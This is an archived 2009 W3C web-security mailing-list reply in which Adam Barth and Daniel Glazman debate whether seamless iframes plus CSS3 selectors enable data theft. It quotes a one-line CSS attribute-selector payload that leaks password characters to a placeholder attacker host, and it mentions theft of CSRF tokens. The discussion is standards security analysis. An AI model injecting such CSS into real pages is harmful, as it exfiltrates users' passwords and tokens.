W3C home > Mailing lists > Public > public-web-security@w3.org > December 2009

Re: Seamless iframes + CSS3 selectors = bad idea

From: Adam Barth <w3c@adambarth.com>
Date: Mon, 7 Dec 2009 12:29:31 -0800
Message-ID: <7789133a0912071229v3ead2fc5k745d3f82386ade6a@mail.gmail.com>
To: Daniel Glazman <daniel@glazman.org>
Cc: public-web-security@w3.org
On Mon, Dec 7, 2009 at 12:26 PM, Daniel Glazman <daniel@glazman.org> wrote:
>>
>> input[type=password][value^=a]{background:url("//attacker/password_starts_with=a")}
>>
>> create a new type of XSS attacks, and those are purely CSS based XSS
>> attacks.. without JS.. that will allow an attacker to read arbitrary files
>> from the page WITHOUT the need of JS.
>
> Not at all. I repeat: not at all.

I would encourage you to read the full thread before responding.  A
more compelling risk is the theft of secret tokens used to protect
against CSRF.  Those are stored in the default value of attributes of
input elements.

Adam
Received on Monday, 7 December 2009 20:30:38 GMT

This archive was generated by hypermail 2.2.0+W3C-0.50 : Sunday, 19 December 2010 00:16:01 GMT